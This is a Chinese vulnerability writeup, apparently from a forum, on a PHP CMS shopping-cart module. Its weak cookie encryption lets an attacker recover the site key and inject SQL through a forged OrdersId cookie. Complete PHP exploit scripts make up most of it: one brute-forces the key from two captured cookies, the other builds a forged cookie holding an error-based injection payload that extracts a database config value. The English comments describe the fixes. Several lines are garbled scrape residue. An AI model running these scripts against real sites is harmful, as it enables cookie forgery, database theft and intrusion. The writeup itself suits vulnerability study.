www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中，
先看一下这个 shopcar 类是如何生成 cookie 的：
/**
 * Stores $value in cookie $key for 36000 seconds under path '/'.
 *
 * Arrays are first flattened by enCode() (per the surrounding text, into the
 * a=yy&b=cc form) and then passed to enCrypt(); scalars go straight to
 * enCrypt(). The cookie carries no integrity tag: its only protection is the
 * enCrypt()/setKey() layers below, whose key is recoverable from one known
 * plaintext, so anything read back from this cookie has to be treated as
 * attacker-controlled input and validated before use.
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // NOTE(review): only expiry and path are set; no Secure/HttpOnly flags.
    setcookie($key,$value,time()+36000,'/');
}
简单地说，$key 就是 cookie 的 key，$value 就是 value。enCode 的作用是将 array 类型转换为 a=yy&b=cc&d=know 这样的字符串，关键在于 enCrypt 函数：
/**
 * Obfuscates $txt with a per-call key, then applies setKey() and base64.
 *
 * Weakness visible in this body: $encrypt_key is md5(rand(0, 32000)), i.e.
 * at most 32001 candidate keys drawn from a non-cryptographic PRNG, and each
 * key byte is interleaved into $tmp right next to the plaintext byte it XORs.
 * $tmp is therefore fully determined by the plaintext plus one of 32001
 * guesses; with a predictable plaintext (the cart fields) an attacker can
 * enumerate them and derive the outer setKey() key from a single cookie.
 * Fix: derive keys with random_bytes()/random_int(), and authenticate the
 * cookie (hash_hmac + hash_equals) or keep the cart state server-side
 * instead of relying on an XOR cipher for integrity.
 */
function enCrypt($txt)
{
    // srand/rand: seeded from microtime, predictable and not suitable for keys
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // key byte is emitted alongside the byte it masks
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * Repeating-key XOR of $txt with md5(strtolower($cfg_cookie_encode)).
 *
 * The key is a 32-character hex digest reused every 32 bytes, so XORing any
 * 32 consecutive ciphertext bytes with the matching plaintext bytes yields
 * the key, after which arbitrary cookies can be forged. There is no MAC, so
 * callers cannot detect tampering. The site secret is also lowercased before
 * hashing, which discards part of whatever entropy it had.
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index every strlen($encrypt_key) bytes
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt 我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp，这个参数在某种意义上我们也是可知的，因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能，我们可以推出 32000 种可能的 $tmp，从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了，忘记说了，我们的目的是推测出 setKey 中 $encrypt_key 的值，然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中，简单过滤掉含非字母数字字符的 key，就只剩下几百个可能的 key；然后我们再重新下一次订单，再获取几百个可能的 key，两者取交集，得到最终的 key。
具体代码如下：
<?php
// Proof-of-concept from the writeup: recovers md5(strtolower($cfg_cookie_encode))
// from two captured shopping-cart cookies plus the predictable cart plaintext.
// It only works because enCrypt() draws its inner key from rand(0, 32000) and
// setKey() is an unauthenticated repeating-key XOR; a CSPRNG-derived key or an
// HMAC over the cookie removes the precondition.
$cookie1 = "X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw=="; // here is the first cookie,change here
$cookie2 = "ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ=="; // here is the second cookie ,change here
$plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // here is the text , change here
/**
 * Derives a setKey() key candidate from one cookie.
 *
 * For a repeating-key XOR, ciphertext ^ plaintext == key, so the first 32
 * bytes of the base64-decoded cookie XORed with the first 32 bytes of the
 * candidate inner-layer text give the 32-character key that candidate implies.
 */
function reStrCode($code,$string)
{
    $code = base64_decode($code);
    $key = "";
    for($i=0 ; $i<32 ; $i++)
    {
        $key .= $string[$i] ^ $code[$i];
    }
    return $key;
}
/**
 * Enumerates the inner keys md5($j) that enCrypt() could have drawn, rebuilds
 * the inner-layer text for the known cart plaintext exactly as enCrypt() does,
 * and turns each into a setKey() key candidate via reStrCode(). Candidates
 * that are not purely [a-z0-9] are dropped, since the real key is an md5 hex
 * digest. Returns the surviving candidates (also echoed one per line).
 */
function getKeys($cookie,$plantxt)
{
    $tmp = $cookie;
    $results = array();
    for($j=0 ; $j < 32000; $j++)
    {
        // mirror enCrypt()'s inner layer for candidate key md5($j)
        $txt = $plantxt;
        $ctr = 0;
        $tmp = '';
        $encrypt_key = md5($j);
        for($i =0; $i < strlen($txt); $i ++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        $string = $tmp;
        $code = $cookie;
        $result = reStrCode($code,$string);
        // keep only hex-digest-looking keys
        if(eregi('^[a-z0-9]+$',$result))
        {
            echo $result."\n";
            $results[] = $result;
        }
    }
    return $results;
}
// The setKey() key is the same for every cookie the site issues, so the
// intersection of the two candidate sets is the real key.
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print "\n——————–real key————————–\n";
foreach($results1 as $test1)
{
    foreach($results2 as $test2)
    {
        if($test1 == $test2)
        {
            echo $test1."\n";
        }
    }
}
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie，
plantxt 可以根据页面自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后，我们就可以构造任意购物车的 cookie。
接着看：
) r. l T% A& h) R20 class MemberShops
1 O5 Q" F! G" {0 C, o6 W21 {
8 ?/ E1 V4 C. d- T5 b22 var $OrdersId;
3 d! A. c6 O- h23 var $productsId;
" G: g* E3 f. O# Z8 L) H8 v. e24
/**
 * Loads the order id from the "OrdersId" cookie and only creates a new order
 * when that cookie is empty.
 *
 * The cookie value is trusted as-is: nothing here checks that OrdersId has the
 * shape of an order id (e.g. ctype_alnum() or a strict regex) before it is
 * kept on the object and later interpolated into SQL in carbuyaction.php.
 * Because the cookie encryption in shopcar.class.php is recoverable, this
 * value is attacker-controlled and must be validated at this boundary.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是从 cookie 里面获取的。
然后看
/plus/carbuyaction.php 中的：
// carbuyaction.php: the order id is taken from the cookie-backed
// MemberShops::OrdersId; no validation happens on this path.
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order number recorded for this request
……
// Injection point: $OrdersId (attacker-controlled via the cookie) is
// string-interpolated into the query. Fix: bind it as a parameter of a
// prepared statement, and additionally reject any OrdersId that does not
// match the expected id format before it reaches the database layer.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了。
通过利用下面的代码生成 cookie：
<?php
// Cookie-forging step from the writeup: with the recovered setKey() key, an
// arbitrary OrdersId value can be wrapped into a cookie that carbuyaction.php
// accepts. Server-side, this is stopped by validating OrdersId and by using a
// parameterised query; the forged cookie is indistinguishable from a genuine
// one only because the cookie has no MAC.
$txt = "1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1";
$encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here
/**
 * Local copy of shopcar's setKey(): repeating-key XOR of $txt, with the key
 * read from the recovered $encrypt_key global instead of $cfg_cookie_encode.
 */
function setKey($txt)
{
    global $encrypt_key;
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
/**
 * Local copy of shopcar's enCrypt(): the same rand()-derived inner layer,
 * followed by the local setKey() and base64. Kept byte-for-byte identical to
 * the CMS version so the output decodes on the server side.
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode(setKey($tmp));
}
// Re-run enCrypt() (each call draws a fresh inner key) until the base64
// output contains no '+' character, then print the resulting cookie value.
for($dest =0;$dest = enCrypt($txt);)
{
    if(!strpos($dest,'+'))
    {
        break;
    }
}
echo $dest."\n";
?>
" y* k# p" Q9 Y5 G0 ~ j
* _& V9 B5 H, \; ?1 [9 T |